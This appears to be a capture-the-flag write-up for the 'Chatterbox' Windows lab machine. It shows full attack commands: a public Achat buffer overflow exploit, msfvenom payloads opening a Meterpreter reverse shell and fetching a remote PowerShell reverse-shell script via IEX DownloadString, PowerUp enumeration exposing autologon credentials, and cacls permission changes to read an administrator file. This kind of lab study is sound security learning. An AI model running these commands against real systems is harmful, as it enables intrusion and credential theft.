Today, we’re going to solve another CTF machine “Chatterbox“. It is now a retired box and can be accessible to VIP members.
Specifications
• Target OS: Windows
• Services: 9255, 9256
• IP Address: 10.10.10.74
• Difficulty: Medium
Contents
• Getting user
• Getting root
Enumeration
As always, the first step consists of the reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
nmap -p 1-65535 -T4 -A -v 10.10.10.74
Enumerating Port 9255
Nmap reveals there’s Achat service running on http protocol.
We got nothing here let’s move ahead.
Enumerating Port 9256
We know there’s an achat application installed. To find the version of it we can do banner grabbing but in this case it didn’t worked.
Let’s searchsploit achat
Exploit: Achat 0.150 beta7 – Remote Buffer Overflow
searchsploit -m exploits/windows/remote/36025.py
Let’s edit our exploit.
Exploitation
Exploit: https://www.exploit-db.com/exploits/36025
Method #1
Let’s create our payload first and insert into exploit.
msfvenom — platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x 88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\ xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1 \xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We executed our exploit and starting listening our reverse shell.
Reverse shell was consistently being closed so we migrated upon executing.
set AutoRunScript post/windows/manage/migrate
System Information
Method #2
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.27:8000/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
However, metasploit shell is much convenient.
User flag can be found here C:\Users\Alfred\Desktop\user.txt
Privilege Escalation
Let’s start by doing basic priv esc enumeration.
By running through some basic priv esc enumeration and running powerup.ps1 script we got credentials in the registry for autologon.
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
DefaultUserName: Alfred DefaultPassword: Welcome1!
There’s a possibility that the password can be reuse for administrator. But since we already have read access into administrator directory as user alfred, we see in below screenshot.
We can change permissions on root.txt using icacls.
C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
CHATTERBOX\Administrator:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHATTERBOX\Alfred:(OI)(CI)(ID)F
C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
cacls root.txt /g Alfred:r
y
Are you sure (Y/N)?processed file: C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop\root.txt cacls C:\Users\Administrator\Desktop\root.txt C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:R
